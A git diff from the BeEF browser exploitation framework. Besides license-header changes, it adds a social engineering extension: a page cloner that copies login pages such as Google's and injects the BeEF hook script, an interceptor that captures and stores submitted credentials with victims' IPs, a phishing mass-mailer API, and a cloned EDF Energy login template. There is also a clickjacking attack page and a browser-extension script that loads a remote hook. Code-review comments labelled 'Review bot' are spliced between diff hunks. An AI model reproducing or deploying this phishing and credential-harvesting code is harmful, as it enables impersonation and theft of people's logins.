-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 extension:
diff --git a/extensions/customhook/extension.rb b/extensions/customhook/extension.rb
index 089425f23..644c3be36 100644
--- a/extensions/customhook/extension.rb
+++ b/extensions/customhook/extension.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/customhook/handler.rb b/extensions/customhook/handler.rb
index 04b601094..621333741 100644
--- a/extensions/customhook/handler.rb
+++ b/extensions/customhook/handler.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/customhook/html/index.html b/extensions/customhook/html/index.html index c1acd833a..0c4aee29b 100644 --- a/extensions/customhook/html/index.html +++ b/extensions/customhook/html/index.html @@ -1,3 +1,8 @@ + <%= @customhook_title %> diff --git a/extensions/demos/api.rb b/extensions/demos/api.rb index 1f3e883a8..543876bd9 100644 --- a/extensions/demos/api.rb +++ b/extensions/demos/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/demos/chrome_extension/index.html b/extensions/demos/chrome_extension/index.html index 1edb829c0..702914d70 100644 --- a/extensions/demos/chrome_extension/index.html +++ b/extensions/demos/chrome_extension/index.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/chrome_extension/persistent_tab.html b/extensions/demos/chrome_extension/persistent_tab.html index 836354aae..65a992234 100644 --- a/extensions/demos/chrome_extension/persistent_tab.html +++ b/extensions/demos/chrome_extension/persistent_tab.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/config.yaml b/extensions/demos/config.yaml index 2cdbc00c7..d74ae8563 100644 --- a/extensions/demos/config.yaml +++ b/extensions/demos/config.yaml 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 extension:
diff --git a/extensions/demos/extension.rb b/extensions/demos/extension.rb
index 635cea52d..c6684cf37 100644
--- a/extensions/demos/extension.rb
+++ b/extensions/demos/extension.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js index e20376b0e..808322d68 100644 --- a/extensions/demos/flash_update_chrome_extension/background.js +++ b/extensions/demos/flash_update_chrome_extension/background.js @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + d=document; e=d.createElement('script'); e.src="http://127.0.0.1:3000/hook.js"; diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html index f058afc95..c1920bed3 100644 --- a/extensions/demos/html/basic.html +++ b/extensions/demos/html/basic.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/html/butcher/butch.css b/extensions/demos/html/butcher/butch.css index c5e6b59b4..efb2f7610 100644 --- a/extensions/demos/html/butcher/butch.css +++ b/extensions/demos/html/butcher/butch.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + html { height: 100%; } 
diff --git a/extensions/demos/html/butcher/index.html b/extensions/demos/html/butcher/index.html index abede7df6..5c7b8264b 100644 --- a/extensions/demos/html/butcher/index.html +++ b/extensions/demos/html/butcher/index.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/html/butcher/jquery-1.5.min.js b/extensions/demos/html/butcher/jquery-1.5.min.js index fe9eef546..86b5f7755 100644 --- a/extensions/demos/html/butcher/jquery-1.5.min.js +++ b/extensions/demos/html/butcher/jquery-1.5.min.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * jQuery JavaScript Library v1.5 * http://jquery.com/ diff --git a/extensions/demos/html/butcher/secret_page.html b/extensions/demos/html/butcher/secret_page.html index cf295841d..328d1d06f 100644 --- a/extensions/demos/html/butcher/secret_page.html +++ b/extensions/demos/html/butcher/secret_page.html @@ -1,3 +1,8 @@ + Secret Page diff --git a/extensions/demos/html/checkJava.java b/extensions/demos/html/checkJava.java index c618ce069..a936e5733 100755 --- a/extensions/demos/html/checkJava.java +++ b/extensions/demos/html/checkJava.java 
@@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/extensions/demos/html/clickjack.html b/extensions/demos/html/clickjack.html deleted file mode 100644 index 486fe35b0..000000000 --- a/extensions/demos/html/clickjack.html +++ /dev/null @@ -1,4 +0,0 @@ -

 

-moooooooo -

 

- diff --git a/extensions/demos/html/clickjacking/clickjack_attack.html b/extensions/demos/html/clickjacking/clickjack_attack.html new file mode 100644 index 000000000..a526b7c6c --- /dev/null +++ b/extensions/demos/html/clickjacking/clickjack_attack.html @@ -0,0 +1,182 @@ + + + + + + + You have been p0wned + + + + + + + + + + +
+
+
+

Name That Quote

+
You are a sad strange little man, and you have my pity.
+
+ Who said it? + Buzz Lightyear, Toy Story +
+ Another Quote +
+
+
+ + +
+
+

Click-thru

+

You must click here to get to the page.

+ Okay + No Thanks +
+
+ + + + + diff --git a/extensions/demos/html/clickjacking/clickjack_victim.html b/extensions/demos/html/clickjacking/clickjack_victim.html new file mode 100644 index 000000000..5024b0f15 --- /dev/null +++ b/extensions/demos/html/clickjacking/clickjack_victim.html @@ -0,0 +1,19 @@ + + + + + + + + + +

 

+moooooooo +

 

+moooooooo + + diff --git a/extensions/demos/html/passwd_manager_theft.html b/extensions/demos/html/passwd_manager_theft.html deleted file mode 100644 index 4a2d70c50..000000000 --- a/extensions/demos/html/passwd_manager_theft.html +++ /dev/null @@ -1,27 +0,0 @@ - - - BeEF Password Manager Theft Demo - - - -

Password Manager Theft Demo

- -

- Instructions:
-
- 1. Write a fake username and password in the form below
- 2. After having submitted the form, make sure you tell firefox that you want to save
- 3. Exploit your hooked browser with the password manager theft command module. -

- -

-

- Username:

- Password:
- -
-

- - - - \ No newline at end of file diff --git a/extensions/demos/html/plain.html b/extensions/demos/html/plain.html index ff8ec25c3..1a37a3820 100644 --- a/extensions/demos/html/plain.html +++ b/extensions/demos/html/plain.html @@ -1,3 +1,8 @@ + + + + + +MyAccount + + + + + + + + + + + + + + + + +
+ + +
+
+ + + + + + +
+
+ + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + MyAccount + + + + + + + + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + +
+
+ + +
    +

    +
    + +
    +
+ +
+
+ +
+
+ + + + + + +
+

+ main content +

+
+ +
+ +
+
+
+

Login to MyAccount

+ + + +
+ + + + + + + + + +
+ + + + + + + + + + + + + + +
+ + + + helpPlease enter your username +
+ + + + helpPlease enter the password for this account +
+ + + + + +


+

Forgotten your username or password?

+
+ + +
+
+

Register Today!

+

 

+ +
    +
  • View and pay your bills
  • +
  • Submit your meter reading
  • +
  • Update your details
  • +
  • Sign up for Direct Debit
  • +

+ + + + + +
+ + +    +
+
+

Don't have an online account?
You can still submit a meter reading

+
+
+
+
+
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+ + + + +
+ + + \ No newline at end of file diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png new file mode 100644 index 000000000..2734ec427 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png differ diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png new file mode 100644 index 000000000..51ca21042 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png differ diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png new file mode 100644 index 000000000..a4f175112 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png differ diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb new file mode 100644 index 000000000..08599e5e4 --- /dev/null +++ b/extensions/social_engineering/models/interceptor.rb @@ -0,0 +1,25 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + class Interceptor + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_interceptor' + + property :id, Serial + property :ip, Text, :lazy => false + property :post_data, Text, :lazy => false + + belongs_to :webcloner + + end + + end + end +end 
diff --git a/extensions/social_engineering/models/mass_mailer.rb b/extensions/social_engineering/models/mass_mailer.rb new file mode 100644 index 000000000..64faa59aa --- /dev/null +++ b/extensions/social_engineering/models/mass_mailer.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + + class Massmailer + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_massmailer' + + property :id, Serial + + #todo fields + end + + end + end +end diff --git a/extensions/social_engineering/models/web_cloner.rb b/extensions/social_engineering/models/web_cloner.rb new file mode 100644 index 000000000..0e18315cb --- /dev/null +++ b/extensions/social_engineering/models/web_cloner.rb @@ -0,0 +1,26 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + class Webcloner + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_webcloner' + + property :id, Serial + + property :uri, Text, :lazy => false + property :mount, Text, :lazy => false + + has n, :extension_seng_interceptor, 'Interceptor' + + end + + end + end +end diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb new file mode 100644 index 000000000..332eebf6c --- /dev/null +++ b/extensions/social_engineering/rest/socialengineering.rb 
@@ -0,0 +1,121 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +module BeEF + module Extension + module SocialEngineering + class SEngRest < BeEF::Core::Router::Router + + config = BeEF::Core::Configuration.instance + + before do + error 401 unless params[:token] == config.get('beef.api_token') + halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip) + headers 'Content-Type' => 'application/json; charset=UTF-8', + 'Pragma' => 'no-cache', + 'Cache-Control' => 'no-cache', + 'Expires' => '0' + end + + #Example: curl -H "Content-Type: application/json; charset=UTF-8" + #-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue= + #https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2", "mount":"/url"}' + #-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7 + post '/clone_page' do + request.body.rewind + begin + body = JSON.parse request.body.read + uri = body["url"] + mount = body["mount"] + use_existing = body["use_existing"] + + if uri != nil && mount != nil + if (uri =~ URI::regexp).nil? 
#invalid URI + print_error "Invalid URI" + halt 401 + end + + if !mount[/^\//] # mount needs to start with / + print_error "Invalid mount (need to be a relative path, and start with / )" + halt 401 + end + + web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance + success = web_cloner.clone_page(uri,mount,use_existing) + if success + result = { + "success" => true, + "mount" => mount + }.to_json + else + result = { + "success" => false + }.to_json + end + end + + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/seng/clone_page" + error 400 # Bad Request + end + end + + # Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body' + #-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7 + # Example json_body: + #{ + # "template": "default", + # "subject": "Hi from BeEF", + # "fromname": "BeEF", + # "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx", + # "linktext": "http://beefproject.com", + # "recipients": [{ + # "user1@gmail.com": "Michele", + # "user2@antisnatchor.com": "Antisnatchor" + #}] + #} + post '/send_mails' do + request.body.rewind + begin + body = JSON.parse request.body.read + + template = body["template"] + subject = body["subject"] + fromname = body["fromname"] + link = body["link"] + linktext = body["linktext"] + + if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil? + print_error "All parameters are mandatory." + halt 401 + end + + if (link =~ URI::regexp).nil?#invalid URI + print_error "Invalid link or linktext" + halt 401 + end + + recipients = body["recipients"][0] + + recipients.each do |email,name| + if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil? + print_error "Email [#{email}] or name [#{name}] are not valid/null." 
+ halt 401 + end + end + + mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance + mass_mailer.send_email(template, fromname, subject, link, linktext, recipients) + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/seng/clone_page" + error 400 + end + end + + end + end + end +end \ No newline at end of file diff --git a/extensions/social_engineering/web_cloner/cloned_pages/readme.txt b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt new file mode 100644 index 000000000..ba99c53af --- /dev/null +++ b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt @@ -0,0 +1,12 @@ +This is the directory where the cloned pages will be placed. +If you clone beefproject.com, there will be 2 files: + - beefproject.com <- original, unmodified + - beefproject.com_mod <- modified one + +In case you want to further modify the beefproject.com_mod manually, +and serve it through BeEF, do the following: + - clone the page + - modify the beefproject.com_mod file + - clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call. + +In this way the x_mod page will be served, with your custom modifications. \ No newline at end of file diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb new file mode 100644 index 000000000..758bd3872 --- /dev/null +++ b/extensions/social_engineering/web_cloner/interceptor.rb 
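Review bot: The `rescue Exception => e` that closes both handlers reports every failure as invalid JSON, and in `/send_mails` the message still names `/api/seng/clone_page`. A request without `recipients` fails on `body["recipients"][0]`, and an error raised inside `clone_page` or `send_email` lands in the same branch, so the operator gets a misleading log line and the caller a 400. I would narrow it to `rescue JSON::ParserError => e` and correct the message to `print_error "Invalid JSON input passed to endpoint /api/seng/send_mails"`. Separately, `(uri =~ URI::regexp).nil?` is unanchored and accepts any scheme, while the value is later handed to `wget` and used to build a file name; parsing it and requiring an `http` or `https` scheme with a non-empty host would be a stricter check.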
@@ -0,0 +1,51 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Extension + module SocialEngineering + require 'sinatra/base' + class Interceptor < Sinatra::Base + + configure do + set :show_exceptions, false + end + + # intercept GET + get "/" do + print_info "GET request from IP #{request.ip}" + print_info "Referer: #{request.referer}" + cloned_page = settings.cloned_page + cloned_page + end + + # intercept POST + post "/" do + print_info "POST request from IP #{request.ip}" + request.body.rewind + data = request.body.read + print_info "Intercepted data:" + print_info data + + interceptor_db = BeEF::Core::Models::Interceptor.new( + :webcloner_id => settings.db_entry.id, + :post_data => data, + :ip => request.ip + ) + interceptor_db.save + + if settings.frameable + print_info "Page can be framed :-) Loading original URL into iFrame..." + "\n" + else + print_info "Page can not be framed :-) Redirecting to original URL..." + redirect settings.redirect_to + end + end + end + end + end +end + diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb new file mode 100644 index 000000000..81854644e --- /dev/null +++ b/extensions/social_engineering/web_cloner/web_cloner.rb 
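Review bot: The `post "/"` handler writes the whole request body to the console with `print_info data`, although the same body is already persisted in `post_data`. Logging only its size, for example `print_info "Intercepted #{data.length} bytes"`, would avoid a second copy of submitted form data in terminal scrollback and log files. The result of `interceptor_db.save` is also ignored; DataMapper's `save` returns false by default rather than raising, so `print_error "Unable to store intercepted data" unless interceptor_db.save` would make a failed insert visible.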
@@ -0,0 +1,186 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Extension + module SocialEngineering + class WebCloner + include Singleton + + + def initialize + @http_server = BeEF::Core::Server.instance + @config = BeEF::Core::Configuration.instance + @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/" + @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}" + end + + def clone_page(url, mount, use_existing) + print_info "Cloning page at URL #{url}" + uri = URI(url) + output = uri.host + output_mod = "#{output}_mod" + user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent') + + success = false + + # Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser, + # there is no need to implement the complex logic to handle all different cases. + # We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification. + # So ideally, if the the page needs custom modifications, the web_cloner usage will be the following: + # 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file + # - the user modify the example.com_mod file manually + # 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file + # + if use_existing.nil? 
|| use_existing == false + begin #,"--background" + IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end + success = true + rescue Exception => e + print_error "Errors executing wget: #{e}" + print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH." + end + + if success + File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file| + File.open("#{@cloned_pages_dir + output}", 'r').each do |line| + # Modify the
line changing the action URI to / in order to be properly intercepted by BeEF + if line.include?("") || line.include?("")) && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') + out_file.print add_beef_hook(line) + print_info "BeEF hook added :-D" + else + out_file.print line + end + end + end + end + end + + if File.size("#{@cloned_pages_dir + output}") > 0 + print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" + + file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve + + # if the user wants to clone http://a.com/login.jsp?cas=true&ciccio=false , split the URL mounting only the path. + # then the phishing link can be used anyway with all the proper parameters to looks legit. + if mount.include?("?") + mount = mount.split("?").first + print_info "Normalizing mount point. You can still use params for the phishing link." + end + + # Check if the original URL can be framed + frameable = is_frameable(url) + + interceptor = BeEF::Extension::SocialEngineering::Interceptor + interceptor.set :redirect_to, url + interceptor.set :frameable, frameable + interceptor.set :beef_hook, @beef_hook + interceptor.set :cloned_page, get_page_content(file_path) + interceptor.set :db_entry, persist_page(url,mount) + + @http_server.mount("#{mount}", interceptor.new) + print_info "Mounting cloned page on URL [#{mount}]" + @http_server.remap + success = true + else + print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'." + success = false + end + + success + end + + private + # Replace with + def add_beef_hook(line) + if line.include?("") + line.gsub!("","\n") + elsif + line.gsub!("","\n") + end + line + end + + private + # check if the original URL can be framed. 
NOTE: doesn't check for framebusting code atm + def is_frameable(url) + result = true + begin + uri = URI(url) + http = Net::HTTP.new(uri.host, uri.port) + if uri.scheme == "https" + http.use_ssl = true + http.verify_mode = OpenSSL::SSL::VERIFY_NONE + end + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + frame_opt = response["X-Frame-Options"] + + if frame_opt != nil + if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0 + result = false + end + end + print_info "Page can be framed: [#{result}]" + rescue Exception => e + result = false + print_error "Unable to determine if page can be framed. Page can be framed: [#{result}]" + print_debug e + #print_debug e.backtrace + end + result + end + + def get_page_content(file_path) + file = File.open(file_path,'r') + cloned_page = file.read + file.close + cloned_page + end + + def persist_page(uri, mount) + webcloner_db = BeEF::Core::Models::Webcloner.new( + :uri => uri, + :mount => mount + ) + webcloner_db.save + webcloner_db + end + + end + end + end +end + diff --git a/extensions/xssrays/api.rb b/extensions/xssrays/api.rb index ee98ed8e0..2eff2b316 100644 --- a/extensions/xssrays/api.rb +++ b/extensions/xssrays/api.rb 
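Review bot: In `clone_page`, `success = true` is set as soon as the `IO.popen` block returns, so a non-zero exit from `wget` counts as success and only a missing binary reaches the `rescue`. After the block `$?` holds the child's status, so `success = $?.success?` would reflect the real outcome. The later `File.size(...) > 0` test raises `Errno::ENOENT` when the file is absent (for instance `use_existing` set with no earlier clone), which the REST handler then reports as invalid JSON; `if File.size?("#{@cloned_pages_dir + output}")` returns nil for a missing or empty file and avoids that. Both the `wget` call (`--no-check-certificate`) and `is_frameable` (`OpenSSL::SSL::VERIFY_NONE`) turn off certificate verification, which deserves a comment or a config switch if it is deliberate. In `add_beef_hook` the bare `elsif` makes the following `gsub!` its condition and should be `else`.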
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb index ce5d31548..ceb0b3374 100644 --- a/extensions/xssrays/api/scan.rb +++ b/extensions/xssrays/api/scan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension 
@@ -53,19 +43,9 @@ module BeEF # todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session) content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('// - // Copyright 2012 Wade Alcorn wade@bindshell.net - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. + // Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + // Browser Exploitation Framework (BeEF) - http://beefproject.com + // See the file \'doc/COPYING\' for copying permission //', "") add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug ws.send(content + @body,hb.session) diff --git a/extensions/xssrays/config.yaml b/extensions/xssrays/config.yaml index 84d136b5a..20b710e62 100644 --- a/extensions/xssrays/config.yaml +++ b/extensions/xssrays/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/admin_ui/controllers/xssrays/xssrays.rb b/extensions/xssrays/controllers/xssrays.rb similarity index 87% rename from extensions/admin_ui/controllers/xssrays/xssrays.rb rename to extensions/xssrays/controllers/xssrays.rb index c951f62e5..d8ea2f3fe 100644 --- a/extensions/admin_ui/controllers/xssrays/xssrays.rb +++ 